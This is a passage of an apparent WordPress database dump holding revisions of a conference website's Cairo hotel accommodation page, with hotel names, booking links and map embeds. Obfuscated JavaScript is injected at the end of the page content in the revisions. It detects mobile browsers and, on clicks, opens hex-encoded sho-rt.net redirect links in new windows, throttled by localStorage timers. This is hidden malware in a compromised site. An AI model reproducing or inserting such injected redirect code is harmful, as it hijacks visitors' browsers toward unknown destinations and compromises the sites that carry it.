g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-06-25 18:55:23','2023-06-25 18:55:23','',2685,'https://gsw2023.com/?p=4836',0,'revision','',0),
(4837,4,'2023-06-25 18:57:23','2023-06-25 18:57:23','<p>[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5></h5>\n<h5>Deadline for the Special Rates is August 10, 2023</h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fsteigenberger-hotel-el-tahrir%2F\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"4788\" primary_title=\"Grand Nile Tower Hotel\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Grand Nile Tower Hotel\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.grandniletower.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgrand-nile-tower-hotel%2F|title:Grand%20Nile%20Tower%20Hotel\"]</p>\n<ul>\n<li>https://www.grandniletower.com/</li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5></h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_media_gallery_carousel image_border_radius=\"0px\" project_icon_border_width=\"0px\" arrow_bg_width=\"36x\" arrow_border_width=\"0px\" r_arrow_icon_paddings=\"0px 0px 0px 0px\" r_arrow_v_offset=\"0px\" l_arrow_icon_paddings=\"0px 0px 0px 0px\" l_arrow_v_offset=\"0px\" include=\"4833,4791\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-06-25 18:57:23','2023-06-25 18:57:23','',2685,'https://gsw2023.com/?p=4837',0,'revision','',0),
(4838,4,'2023-06-25 18:58:24','2023-06-25 18:58:24','<p>[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5></h5>\n<h5>Deadline for the Special Rates is August 10, 2023</h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" 